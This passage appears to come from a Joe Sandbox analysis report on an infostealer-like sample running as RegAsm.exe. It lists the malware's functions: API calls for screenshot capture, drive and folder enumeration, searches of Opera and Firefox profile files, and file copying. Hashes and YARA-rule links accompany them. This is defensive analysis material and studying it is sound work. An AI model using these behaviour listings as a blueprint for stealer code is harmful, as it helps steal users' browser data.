                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Object$Window$CompatibleCreateDeleteGlobalH_prologSelectlstrcpy$BitmapCloseDesktopInternetOpenRectReleaseSizelstrlenmemset
                                                                                • String ID: image/jpeg
                                                                                • API String ID: 3067874393-3785015651
                                                                                • Opcode ID: 70786a0f146ffecec4e1b9b9cc4c00fb730120a767e4e931db604414e9c13406
                                                                                • Instruction ID: e481ec1d7c30d31008a5a4d171f0d2eaa52fce57a9362255ea0698d6e4794ba3
                                                                                • Opcode Fuzzy Hash: 70786a0f146ffecec4e1b9b9cc4c00fb730120a767e4e931db604414e9c13406
                                                                                • Instruction Fuzzy Hash: A05118B2D00218AFDF01AFE5DD499EEBFB9FF09714F10402AFA05E2160D7394A558BA5
                                                                                Function 00415AC2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 133stringfileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00415AC7
                                                                                • wsprintfA.USER32 ref: 00415AEA
                                                                                • FindFirstFileA.KERNEL32(?,?), ref: 00415B01
                                                                                • StrCmpCA.SHLWAPI(?,004268D4), ref: 00415B23
                                                                                • StrCmpCA.SHLWAPI(?,004268D8), ref: 00415B3D
                                                                                • lstrcat.KERNEL32(?,?), ref: 00415B72
                                                                                • lstrcat.KERNEL32(?), ref: 00415B85
                                                                                • lstrcat.KERNEL32(?,?), ref: 00415B99
                                                                                • lstrcat.KERNEL32(?,?), ref: 00415BA9
                                                                                • lstrcat.KERNEL32(?,004268DC), ref: 00415BBB
                                                                                • lstrcat.KERNEL32(?,?), ref: 00415BCF
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                  • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                                  • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                                  • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                                  • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                                  • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                                  • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                  • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                  • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                  • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                • FindNextFileA.KERNEL32(00000000,?), ref: 00415C69
                                                                                • FindClose.KERNEL32(00000000), ref: 00415C78
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcat$File$H_prolog$Find$CloseCreate$AllocFirstHandleLocalNextObjectReadSingleSizeThreadWaitlstrcpywsprintf
                                                                                • String ID: %s\%s
                                                                                • API String ID: 2282932919-4073750446
                                                                                • Opcode ID: 297e3daf63be3f9388da754876be3650526065ada206baa5a6a1fd9e4802f159
                                                                                • Instruction ID: 94379aee551275b5d998bba74236b2289a82a8dc712773d574ff1e2d259f5726
                                                                                • Opcode Fuzzy Hash: 297e3daf63be3f9388da754876be3650526065ada206baa5a6a1fd9e4802f159
                                                                                • Instruction Fuzzy Hash: 9E511D72900229ABDF11EBA1DD49EDE7B7CAF49304F0404AAE605E2151E7389789CBA5
                                                                                Function 00409F72 Relevance: 23.4, APIs: 8, Strings: 5, Instructions: 628fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00409F77
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                  • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                  • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                  • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,?,?,00425C06,00000000,-00000020,00000000), ref: 00409FF6
                                                                                • StrCmpCA.SHLWAPI(?,00425E68), ref: 0040A050
                                                                                • StrCmpCA.SHLWAPI(?,00425E6C), ref: 0040A06A
                                                                                • StrCmpCA.SHLWAPI(00000000,Opera,00425C13,00425C12,00425C0F,00425C0E,00425C0B,00425C0A,00425C07), ref: 0040A0FD
                                                                                • StrCmpCA.SHLWAPI(00000000,Opera GX), ref: 0040A111
                                                                                • StrCmpCA.SHLWAPI(00000000,Opera Crypto), ref: 0040A125
                                                                                  • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prologlstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                • String ID: 7$Opera$Opera Crypto$Opera GX$\*.*
                                                                                • API String ID: 3869166975-536343317
                                                                                • Opcode ID: 6700c66a51acd6c16a295116433c442144113a80d9080ee2fe10d6ef4b4d74b1
                                                                                • Instruction ID: a17e2f684122670e3be7096712bbacc747ed706b0b8df0d6fbcd956b9d9e9cda
                                                                                • Opcode Fuzzy Hash: 6700c66a51acd6c16a295116433c442144113a80d9080ee2fe10d6ef4b4d74b1
                                                                                • Instruction Fuzzy Hash: 2C425B70904288EADF15EBE5C955BDDBBB46F29308F5040BEA409736C2DB781B4CCB66
                                                                                Function 00415843 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 151stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00415848
                                                                                • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004158AA
                                                                                • memset.MSVCRT ref: 004158C9
                                                                                • GetDriveTypeA.KERNEL32(?), ref: 004158D2
                                                                                • lstrcpy.KERNEL32(?,00000000), ref: 004158F2
                                                                                • lstrcpy.KERNEL32(?,00000000), ref: 00415910
                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                  • Part of subcall function 004153F6: _EH_prolog.MSVCRT ref: 004153FB
                                                                                  • Part of subcall function 004153F6: wsprintfA.USER32 ref: 00415421
                                                                                  • Part of subcall function 004153F6: FindFirstFileA.KERNEL32(?,?), ref: 00415438
                                                                                  • Part of subcall function 004153F6: memset.MSVCRT ref: 0041544F
                                                                                  • Part of subcall function 004153F6: memset.MSVCRT ref: 0041545D
                                                                                  • Part of subcall function 004153F6: StrCmpCA.SHLWAPI(?,0042684C), ref: 0041547B
                                                                                  • Part of subcall function 004153F6: StrCmpCA.SHLWAPI(?,00426850), ref: 00415495
                                                                                  • Part of subcall function 004153F6: wsprintfA.USER32 ref: 004154B9
                                                                                  • Part of subcall function 004153F6: StrCmpCA.SHLWAPI(?,0042656E), ref: 004154CA
                                                                                  • Part of subcall function 004153F6: wsprintfA.USER32 ref: 004154F0
                                                                                  • Part of subcall function 004153F6: memset.MSVCRT ref: 00415516
                                                                                  • Part of subcall function 004153F6: lstrcat.KERNEL32(?,?), ref: 00415528
                                                                                  • Part of subcall function 004153F6: strtok_s.MSVCRT ref: 00415561
                                                                                  • Part of subcall function 004153F6: memset.MSVCRT ref: 00415576
                                                                                  • Part of subcall function 004153F6: lstrcat.KERNEL32(?,?), ref: 0041558B
                                                                                • lstrcpy.KERNEL32(?,00000000), ref: 00415933
                                                                                • lstrlenA.KERNEL32(?), ref: 00415998
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memset$H_prologlstrcpywsprintf$Drivelstrcat$FileFindFirstLogicalStringsTypelstrlenstrtok_s
                                                                                • String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
                                                                                • API String ID: 2879972474-147700698
                                                                                • Opcode ID: 4245d552df83b068be1558a689d43aef9dea607818b0117f9054742c8dc341e5
                                                                                • Instruction ID: 8fb32ebea5ed90456f7ca7ea911cfe9f81c0b13f291b8680dac0f4474b3225bb
                                                                                • Opcode Fuzzy Hash: 4245d552df83b068be1558a689d43aef9dea607818b0117f9054742c8dc341e5
                                                                                • Instruction Fuzzy Hash: 395152B190025CEADF30AF61DC55EEE7B7DAF05344F50003ABA15A2191DB386A49CB59
                                                                                Function 00401162 Relevance: 20.0, APIs: 9, Strings: 2, Instructions: 771fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00401167
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00422374,?,?,?,00422370,?,?,00000000,?,00000000), ref: 004013AC
                                                                                • StrCmpCA.SHLWAPI(?,00422378), ref: 004013CA
                                                                                • StrCmpCA.SHLWAPI(?,0042237C), ref: 004013E4
                                                                                • FindFirstFileA.KERNEL32(00000000,?,?,?,?,00422388,?,?,?,00422384,?,?,?,00422380,?,?), ref: 00401510
                                                                                  • Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,00425C93,00000000,00000000,?), ref: 00410D52
                                                                                  • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                  • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                  • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                  • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                  • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426498,00000001,000000C8,00000000,004265BA), ref: 00410BA1
                                                                                  • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                  • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                                  • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                                  • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                                  • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                                  • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                                  • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                                • FindNextFileA.KERNEL32(00000000,?,?,?,?,?,?,0042238C), ref: 00401832
                                                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,0042238C), ref: 00401841
                                                                                • FindNextFileA.KERNEL32(?,?), ref: 00401BD4
                                                                                • FindClose.KERNEL32(?), ref: 00401BE5
                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                  • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                  • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                  • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                  • Part of subcall function 00410CDD: _EH_prolog.MSVCRT ref: 00410CE2
                                                                                  • Part of subcall function 00410CDD: GetFileAttributesA.KERNEL32(00000000,?,0040BAC2,?,00425C4E,?,?), ref: 00410CF6
                                                                                  • Part of subcall function 0040618B: LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406216
                                                                                  • Part of subcall function 00414437: Sleep.KERNEL32(000003E8,?,?,?,?,?,00000000), ref: 004144C0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileH_prolog$Find$lstrcpy$Close$CreateFirstLocalNextlstrcat$AllocAttributesFolderFreeHandleObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
                                                                                • String ID: 7$\*.*
                                                                                • API String ID: 40499504-4165053604
                                                                                • Opcode ID: 2415c5a552409a1327100fa76e5c65bacbb48c19f6e4dd66bfc40bef1be4ee54
                                                                                • Instruction ID: 8097af2253b6e43ffd1ff437b79a581fef85e219c3474a36129b1183f2ad689d
                                                                                • Opcode Fuzzy Hash: 2415c5a552409a1327100fa76e5c65bacbb48c19f6e4dd66bfc40bef1be4ee54
                                                                                • Instruction Fuzzy Hash: 04624D70904188EADB15EBE5C955BDDBBB8AF29308F5040BEA509735C2DF781B4CCB25
                                                                                Function 0040B463 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 311fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 0040B468
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                  • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                  • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                  • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,00425F68,?,?,00425C47,?,00000000,?), ref: 0040B4E7
                                                                                • StrCmpCA.SHLWAPI(?,00425F6C,?,00000000,?), ref: 0040B50B
                                                                                • StrCmpCA.SHLWAPI(?,00425F70,?,00000000,?), ref: 0040B525
                                                                                • StrCmpCA.SHLWAPI(?,prefs.js,00000000,?,?,?,00425F74,?,?,00425C4A,?,00000000,?), ref: 0040B5C1
                                                                                  • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                  • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426498,00000001,000000C8,00000000,004265BA), ref: 00410BA1
                                                                                • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,?,00425F84,?,?,00000000,00425C4B,?,00000000,?), ref: 0040B6C6
                                                                                • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,?), ref: 0040B79B
                                                                                • FindNextFileA.KERNELBASE(?,?,?,00000000,?), ref: 0040B84A
                                                                                • FindClose.KERNEL32(?,?,00000000,?), ref: 0040B85B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileH_prologlstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextSystemTimelstrlen
                                                                                • String ID: prefs.js
                                                                                • API String ID: 2318033617-3783873740
                                                                                • Opcode ID: 5666919e8824e042d0b5f70852cf441639314b1659d2301ad99abcf42152bb5b
                                                                                • Instruction ID: be7758ef0e9bd93280a5f92db672ae0ad47210b716bb060d05ded798a66e6481
                                                                                • Opcode Fuzzy Hash: 5666919e8824e042d0b5f70852cf441639314b1659d2301ad99abcf42152bb5b
                                                                                • Instruction Fuzzy Hash: C9D18471900248EADB14EBE5C956BDDBBB4AF19304F5040BEE409B36C2DB781B4CCB66
                                                                                Function 004094E5 Relevance: 15.3, APIs: 10, Instructions: 301fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 004094EA
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                  • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                  • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                  • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,00425E1C,?,?,00425BFA,?), ref: 00409567
                                                                                • StrCmpCA.SHLWAPI(?,00425E20), ref: 00409584
                                                                                • StrCmpCA.SHLWAPI(?,00425E24), ref: 0040959E
                                                                                • StrCmpCA.SHLWAPI(?,00000000,?,?,?,00425E28,?,?,00425BFB), ref: 00409635
                                                                                • StrCmpCA.SHLWAPI(?), ref: 004096B6
                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                  • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                  • Part of subcall function 00408759: _EH_prolog.MSVCRT ref: 0040875E
                                                                                  • Part of subcall function 00408759: CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,?,00425DC8,?,?,?,00425BEA,00000000), ref: 00408841
                                                                                • FindNextFileA.KERNELBASE(00000000,?), ref: 0040989F
                                                                                • FindClose.KERNEL32(00000000), ref: 004098AE
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prologlstrcpy$FileFind$lstrcat$CloseCopyFirstNextlstrlen
                                                                                • String ID:
                                                                                • API String ID: 322284088-0
                                                                                • Opcode ID: e559499c3d2ef85a473f19cc83e64b7af054a451df30679cf9fec3c86fffa07d
                                                                                • Instruction ID: f469bbe6791ff6929fd52be51ed7484ae91504fa3db0a5c2044313ffea23fdba
                                                                                • Opcode Fuzzy Hash: e559499c3d2ef85a473f19cc83e64b7af054a451df30679cf9fec3c86fffa07d
                                                                                • Instruction Fuzzy Hash: 73C17270900249EADF10EBA5D9167DDBFB8AB09304F10417EE844B36C2DB785B08CBA6
                                                                                Function 0040FCE5 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 96memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 0040FCEA
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                • GetKeyboardLayoutList.USER32(00000000,00000000,004262AF,00000001,?,00000000), ref: 0040FD1C
